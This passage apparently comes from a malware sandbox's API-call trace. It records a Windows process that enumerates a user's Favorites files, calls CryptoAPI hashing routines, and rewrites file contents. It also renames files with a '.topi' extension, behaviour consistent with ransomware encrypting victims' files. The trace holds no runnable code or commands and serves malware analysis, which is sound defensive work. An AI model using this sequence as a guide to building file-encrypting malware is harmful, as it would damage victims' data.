RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.611] GetCurrentThreadId () returned 0x8c4 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.613] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.topi")) returned 1 [0096.614] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.614] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.614] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.615] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.616] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0096.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0096.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.617] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.617] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.620] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.620] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.621] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.622] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.622] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.622] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.622] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.622] GetLastError () returned 0x0 [0096.622] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.622] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.623] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.623] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.623] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.623] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ab0 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02af8 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.623] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a90 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4a78 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.624] GetCurrentThreadId () returned 0x8c4 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f82b0 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.624] GetCurrentThreadId () returned 0x8c4 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4aa8 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02af8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.628] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.628] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.629] WriteFile (in: 